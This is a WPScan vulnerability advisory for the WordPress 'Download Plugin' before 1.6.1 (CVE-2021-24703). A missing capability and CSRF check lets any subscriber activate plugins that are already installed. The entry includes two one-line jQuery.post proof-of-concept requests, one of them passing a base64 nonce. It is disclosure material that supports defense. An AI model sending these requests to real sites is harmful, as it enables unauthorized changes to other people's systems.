WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Download Plugin < 1.6.1 - Subscriber+ Arbitrary Plugin Activation

Description

The plugin does not have capability and CSRF checks in the dpwap_plugin_activate AJAX action, allowing any authenticated users, such as subscribers, to activate plugins that are already installed.

Proof of Concept

v < 1.5.9 - jQuery.post(ajaxurl,{ action:"dpwap_plugin_activate", dpwap_url:"hello.php" })

v < 1.6.0 - jQuery.post(ajaxurl,{ action:"dpwap_plugin_activate", dpwap_url:"hello.php", nonce: base64('dpwap-metagauss') })

Affects Plugins

download-plugin
Fixed in version 1.6.1

References

CVE
CVE-2021-24703

Classification

Type

ACCESS CONTROLS

OWASP top 10
A5: Broken Access Control
CWE
CWE-284

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID
4ed8296e-1306-481f-9a22-723b051122c0

Timeline

Publicly Published

2021-10-19 (about 8 months ago)

Added

2021-10-19 (about 8 months ago)

Last Updated

2022-04-08 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin